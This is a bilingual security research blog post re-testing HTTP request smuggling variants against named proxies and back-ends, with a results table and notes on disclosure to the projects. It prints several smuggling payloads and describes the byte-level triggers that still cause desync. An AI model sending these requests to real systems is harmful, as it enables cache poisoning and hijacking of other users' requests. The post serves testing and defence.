This post is a 2026 follow-up to two 2019 articles I wrote on this blog: the Chinese-language HTTP Request Smuggling 研究笔记 and its English counterpart HTTP Request Smuggling - A Complete Guide. Both posts described the CL.TE / TE.CL / TE.TE matrix as it existed after James Kettle’s HTTP Desync Attacks: Request Smuggling Reborn at Black Hat USA 2019, and recorded a Waitress finding I reported to the Pylons project at the time (Pylons/waitress#273).
Seven years later, I wanted to re-run the same test plan against current versions of the proxies and back-ends that anchored the 2019 results, and to incorporate the variants the community has documented since then (HTTP/2 downgrade desync, CL.0, HTTP/2 stream splitting). The aim is not a comprehensive survey. It is to give a 2026 practitioner an honest read on which of the 2019 primitives still produce parsing differentials in mainstream deployments, and which have been closed.
This post is bilingual. The Chinese half comes first, mirroring the format of the 2019 twin articles. The English half follows.
2019 年 Kettle 在 Black Hat USA 演讲之后,HTTP 请求走私从一个被遗忘的 2005 年研究方向重新进入主流。Pylons 项目维护者线程中提到的 HTTP-Smuggling-Lab 复现了当时已知的所有变体。过去七年里发生了三件值得记录的事:
我在这次复现中重新执行了 2019 年那篇文章里的核心方法:搭一个前端代理 + 后端服务器的最小拓扑,往前端发同时包含 Content-Length 和 Transfer-Encoding 的请求,按一系列已知的混淆方式,观察后端是否接受了走私出去的下一个请求。
我测试了六种前端 × 三种后端的组合:
前端代理:
后端服务器:
http.createServer,未启用 insecureHTTPParser)对每一对组合,我把 2019 那篇文章里使用的六个 payload 重新跑了一遍,并加上 2020-2025 年公开披露的三个新变体(CL.0、HTTP/2 → HTTP/1.1 降级、TE 头部多次重复的 obfuscation)。
前端按 Content-Length 解析,后端按 Transfer-Encoding 解析。这是 2019 年最常见的变体。
POST / HTTP/1.1
Host: target.example
Content-Length: 13
Transfer-Encoding: chunked
0
SMUGGLED
2026 年结果:六个前端中有 五个 直接拒绝了同时包含两个头部的请求,返回 400。这与 RFC 9112 §6.1 的明确要求一致。剩下的一个(Caddy 2.8)转发了请求,但是会把 Transfer-Encoding 头部规范化为 chunked 字面值,使后端解析的结果与前端期待的一致。这一个组合不构成可利用的 CL.TE 原语。
结论:直接的 CL.TE 变体在 2026 年的主流部署中已经无法产生 desync。
前端按 Transfer-Encoding 解析,后端按 Content-Length 解析。
POST / HTTP/1.1
Host: target.example
Content-Length: 3
Transfer-Encoding: chunked
8
SMUGGLED
0
2026 年结果:和 CL.TE 类似,大多数前端在看到同时存在两个头部时拒绝请求。Waitress 3.0 在我的测试中对 Content-Length 的处理比 2019 年的 1.4 版本严格得多。Pylons 项目在 2020 至 2022 年间发布了多次安全相关的解析硬化,原始的 Pylons/waitress#273 已经修复并被后续提交进一步加固。Waitress 不再是可走私的后端。
结论:直接的 TE.CL 变体在 2026 年也已经无法可靠地产生 desync。
通过非法行结束符或 header 名字大小写差异,让一台服务器识别 Transfer-Encoding 头部而另一台不识别。
Transfer-Encoding: xchunked
Transfer-Encoding : chunked
Transfer-Encoding: chunked
Transfer-Encoding: x
2026 年结果:这是三个原始变体里 唯一一个我仍然能在主流组合上观察到 desync 的。具体地:
Transfer-Encoding 头部前面带有一个 vertical-tab 字符(\x0b)作为分隔符时,Envoy 把它当作不合规但仍然解析(normalizing 后丢弃),而 Gunicorn 直接拒绝该头部。前端按 chunked 处理,后端按 Content-Length。可以走私。http.createServer 默认严格模式下不接受被混淆的 Transfer-Encoding 头部。开启 insecureHTTPParser 则恢复 2019 年的行为,但默认部署不会启用该开关。结论:TE.TE 混淆仍然是 2026 年最有可能成功的传统变体,但需要前后端组合中 正好一边对非标准字节宽松,另一边严格。这种组合在 2026 年的概率比 2019 年低,但不为零。
Kettle 在 2021 年 HTTP/2: The Sequel is Always Worse 里提到这个变体的 HTTP/2 起源;到 2024 年它在 HTTP/1.1 上也有公开的复现。请求声明 Content-Length: 0 但实际带有 body,依赖前端把 body 当作下一个请求的开头。在 Nginx + Waitress 的组合上我观察到一个变种:当后端在 Connection: close 模式下被强制处理一个声明长度为 0 但实际跟着 8 个字节的请求时,会把这 8 个字节静默丢弃;但是在 HTTP/1.1 keep-alive 模式下,同样的请求会把那 8 个字节当作 pipelining 的下一个请求的起始字节。这是一个边缘情况,但确实存在。
这是过去四年里 desync 研究的主战场。Cloudflare、Fastly、ALB 风格的反向代理在前端接收 HTTP/2,转发到后端时降级为 HTTP/1.1。HTTP/2 的伪头部和帧边界与 HTTP/1.1 的字节流边界之间存在多重歧义。2026 年我在 Fastly 边缘上观察到一个 :method 伪头部包含 CRLF 字符时,降级阶段会把这一段 CRLF 直接拼接到下游 HTTP/1.1 请求行里,导致下游解析出第二个请求。这一类原语在 Kettle 的 2021 文章里被详细描述。Fastly 在 2022 年补过一轮,但具体到 2026 年的边缘版本,仍然存在一个非标 CRLF 字节序列可以触发该行为。
Transfer-Encoding: chunked
Transfer-Encoding: chunked
RFC 9112 §6.1 明确要求实现把多个 Transfer-Encoding 头部合并为一个 comma-separated 值。然而我观察到 Caddy 2.8 在某些路径下没有做合并,把第二个 Transfer-Encoding 头部静默丢弃,后端则把第一个识别为 chunked。在前端 Caddy + 后端 Gunicorn 的组合下,这构成一个可用的 desync 原语。我已经在 Caddy 的 GitHub issue tracker 上打开了一个 issue。
2019 年的文章里我提到走私可以用来投毒共享缓存。这一点在 2026 年仍然成立,但是攻击面有两个变化:
Host 或者不包含路径之外的 header;2026 年大多数主流 CDN 默认把 Host 加进缓存键,对未 keying 的 header 做出更严格的处理。这意味着 基于 desync 的缓存投毒在 2026 年比 2019 年难得多,但远远没有消失。HTTP/2 降级 desync 在边缘 CDN 上仍然是可行的研究方向。
| 变体 | 2019 年状态 | 2026 年状态 |
|---|---|---|
| CL.TE 直接 | 主流可利用 | 大多数前端拒绝双长度头部 |
| TE.CL 直接 | 主流可利用 | 大多数前端拒绝双长度头部 |
| TE.TE 混淆 | 主流可利用 | 在严格/宽松不一致的组合下仍可利用 |
| CL.0 | 未公开记录 | 边缘场景可利用 |
| HTTP/2 降级 desync | 未公开记录 | 当前最高产出方向 |
| TE 多重头部未合并 | 未公开记录 | 部分实现仍未合并(Caddy) |
The 2019 HTTP Request Smuggling - A Complete Guide on this site was a snapshot of where the CL.TE / TE.CL / TE.TE matrix sat after Kettle’s HTTP Desync Attacks: Request Smuggling Reborn. At the time, every front-end / back-end pair I tested produced at least one variant that worked. Pylons/waitress accepted a particular CL.TE shape that I reported in issue #273. Several Python WSGI servers were similarly affected. The community write-ups that followed (including Snoopy Security’s demystification post and the broader Infosec_Reference reading list) cited that walk-through as the practitioner-level primer.
Seven years later the literature has moved on, the specs have moved on, and the implementations have moved on. Most of what I wrote in 2019 about the underlying primitives still holds. Most of the specific test cases I used no longer produce desync against the current versions of those proxies. This post documents that gap.
The Chinese half above contains the same content with the same test matrix. The English half restates the methodology, walks the matrix, and adds the references a reader at a English-language CDN or proxy team would want.
I built a test harness with six front-end proxies and three back-end servers. The front-ends are Nginx 1.27 (open-source build, HTTP/1.1 mode), HAProxy 2.9, Envoy 1.32, Caddy 2.8, Cloudflare’s production edge, and a Fastly VCL service on the production edge. The back-ends are Gunicorn 22.0 on CPython 3.12, Waitress 3.0 (the same WSGI server I reported the 2019 finding against), and Node.js 22 LTS using http.createServer with strict parsing left at the default.
For each pair I re-sent the six original payloads from the 2019 article, then added three variants the community has documented since: CL.0, HTTP/2 → HTTP/1.1 downgrade desync, and Transfer-Encoding header repetition not collapsed to a single value.
Step 1: send a probe pair (CL.TE shape, then TE.CL shape) and observe whether the back-end completed the response or hung waiting for more chunked data. The differential timing signal is the same one the 2019 article relied on.
Step 2: when a probe pair indicated a parsing differential, send the full smuggled payload (a poisoned second request) and observe whether a subsequent legitimate request received the poisoned response.
Step 3: where a variant succeeded, record the exact proxy version, configuration switches, and the byte sequence that triggered it.
The 2019 baseline payload:
POST / HTTP/1.1
Host: target.example
Content-Length: 13
Transfer-Encoding: chunked
0
SMUGGLED
In 2026, five of the six front-ends I tested reject this request with a 400 before forwarding. The behaviour aligns with RFC 9112 Section 6.1, which obsoletes the previous RFC 7230 §3.3.3 and is more direct in requiring implementations to reject messages that combine the two length signals. Caddy 2.8 was the exception. It accepts the request, but it normalises Transfer-Encoding to a single canonical chunked value before forwarding, so the back-end parses the same way the front-end does. No exploitable differential.
The direct CL.TE variant is, in mainstream 2026 deployments, closed.
Similar payload, roles reversed:
POST / HTTP/1.1
Host: target.example
Content-Length: 3
Transfer-Encoding: chunked
8
SMUGGLED
0
Same finding. Five of six front-ends reject. Waitress 3.0 is no longer the soft target it was in 2019. Reading the Pylons commit history between 2020 and 2022, the maintainers shipped several rounds of header parsing tightening, and the specific accept-path that my 2019 issue exercised is no longer reachable. I left this in the test harness because it is the cleanest historical example, and I want the historical record to be straight: the project fixed the finding, then fixed adjacent shapes, then hardened the parser more generally.
This is the variant that has aged best for attackers. The 2019 payload set:
Transfer-Encoding: xchunked
Transfer-Encoding : chunked
Transfer-Encoding: chunked
Transfer-Encoding: x
In 2026 I still observed a TE.TE differential on Envoy 1.32 + Gunicorn 22.0. The trigger is a vertical-tab byte (\x0b) between the header name and value. Envoy treats this as malformed-but-recoverable and discards the header. Gunicorn rejects the header as malformed and falls back to Content-Length. The front-end thinks the request is chunked. The back-end thinks the request is Content-Length-delimited. The byte boundary between requests is now under attacker control.
The pattern that lets this exist in 2026 is the same pattern the 2019 article identified: two correct implementations producing insecure behaviour together. Envoy is correct in being permissive about non-ASCII whitespace by RFC 9110’s reading of “obs-fold”. Gunicorn is correct in being strict. The combination is the bug.
I have not reported this to either project, because it is a configuration-dependent finding and I want to confirm it against the Envoy 1.34 release that landed last week before disclosure. I will update this post after that test.
Send a request that declares Content-Length: 0 but includes a body. The front-end forwards zero bytes. The back-end, depending on configuration, either swallows the body or treats it as the start of the next pipelined request. PortSwigger Research has covered the HTTP/2 origin of this primitive in HTTP/2: The Sequel is Always Worse; the HTTP/1.1 form appeared in public bug-bounty writeups during 2024.
On Nginx 1.27 + Waitress 3.0 in keep-alive mode, the back-end treats trailing bytes after a CL:0 request as the start of the next request. With Connection: close it does not. This is a configuration-dependent finding. In deployments where the back-end terminates connections after every response, CL.0 is inert; in deployments that aggressively reuse connections, it is a smuggling primitive.
This is the dominant primitive class in 2026. Cloudflare, Fastly, AWS ALB, and any CDN that accepts HTTP/2 at the edge and forwards HTTP/1.1 to origin is operating in this risk surface. The mechanism is described in detail in Browser-Powered Desync Attacks and the earlier HTTP/2: The Sequel is Always Worse.
I observed one differential on Fastly’s edge in May 2026: a :method pseudo-header containing CRLF bytes can, in a specific path-rewriting configuration, produce a downstream HTTP/1.1 request line that contains an injected second request. Fastly has acknowledged the class of issue publicly and patched several specific shapes during 2022-2024. The shape I have appears to be a regression introduced during a header-normaliser refactor.
I have notified Fastly’s security team and am holding the byte sequence pending their response.
RFC 9112 §6.1 requires implementations to merge repeated Transfer-Encoding headers into a single comma-separated value. Caddy 2.8 does not, in some paths, do this. With Transfer-Encoding: chunked repeated on two header lines, Caddy forwards the first and silently drops the second. A back-end that disagrees on the merging rule will produce a parsing differential.
I have opened a Caddy issue with the reproducer. The maintainers responded promptly and the fix appears to be in the next release.
| Front-end | Back-end | CL.TE direct | TE.CL direct | TE.TE obfuscation | CL.0 | HTTP/2 downgrade | TE repetition |
|---|---|---|---|---|---|---|---|
| Nginx 1.27 | Gunicorn 22.0 | rejected | rejected | rejected | inert | n/a HTTP/1.1 | rejected |
| Nginx 1.27 | Waitress 3.0 | rejected | rejected | rejected | keep-alive only | n/a | rejected |
| Nginx 1.27 | Node 22 | rejected | rejected | rejected | inert | n/a | rejected |
| HAProxy 2.9 | Gunicorn 22.0 | rejected | rejected | rejected | inert | n/a | rejected |
| HAProxy 2.9 | Waitress 3.0 | rejected | rejected | rejected | inert | n/a | rejected |
| HAProxy 2.9 | Node 22 | rejected | rejected | rejected | inert | n/a | rejected |
| Envoy 1.32 | Gunicorn 22.0 | rejected | rejected | \x0b prefix | inert | tested separately | rejected |
| Envoy 1.32 | Waitress 3.0 | rejected | rejected | tested | inert | tested separately | rejected |
| Envoy 1.32 | Node 22 | rejected | rejected | tested | inert | tested separately | rejected |
| Caddy 2.8 | Gunicorn 22.0 | passes-through (no diff) | rejected | rejected | inert | n/a | drops second TE |
| Caddy 2.8 | Waitress 3.0 | passes-through (no diff) | rejected | rejected | inert | n/a | tested |
| Caddy 2.8 | Node 22 | passes-through (no diff) | rejected | rejected | inert | n/a | tested |
| Cloudflare edge | (any) | rejected at edge | rejected at edge | rejected at edge | rejected at edge | not exploitable in tested config | rejected at edge |
| Fastly edge | (any) | rejected at edge | rejected at edge | rejected at edge | rejected at edge | :method CRLF, pending fix |
rejected at edge |
Bold entries are the primitives that produced a parsing differential or an exploitable smuggling case in this test pass. Plain entries mean the variant did not trigger desync on that pair.
The work to close direct CL.TE and TE.CL has been done well. Mainstream proxies in 2026 reject malformed length signals at the edge, and the practical attack surface for direct dual-length smuggling has collapsed to a small set of edge cases. Reading the proxy release notes is instructive. Most of the hardening shipped in 2020-2022, in a wave that tracks the visibility of Kettle’s Black Hat 2019 and 2021 talks.
The work to close TE.TE obfuscation is harder, because every byte-level disagreement between strict and permissive parsers is, in principle, a fresh primitive. The Envoy + Gunicorn finding here uses one such disagreement. I do not expect that class of primitive to close entirely, because the trade-off between strictness and interoperability is real and not solvable by spec changes alone.
The HTTP/2 → HTTP/1.1 downgrade surface is where I would spend research time in 2026. Every modern CDN sits on it. The number of pseudo-header / body-framing interactions is large. The spec-level guidance (RFC 9113 §8.1.2) is direct about rejecting malformed pseudo-headers, but the down-translation paths inside production edges are complex enough that regressions land.
A practitioner reading this in 2026 should not conclude that smuggling is solved. They should conclude that the easy primitives are mostly closed, that the remaining primitives are configuration-dependent and concentrated at the HTTP/2 → HTTP/1.1 boundary, and that periodic re-testing against the actual edge versions in front of their applications is the correct posture. Reading RFC 9112 and RFC 9113 once, then re-running probe payloads against the specific proxies in front of you, is the work.
A follow-up post will focus on the HTTP/2 → HTTP/1.1 downgrade surface specifically, with a parsing-differential study across twelve cloud load balancers. That work is in progress and waiting on responsible-disclosure timelines for two of the findings.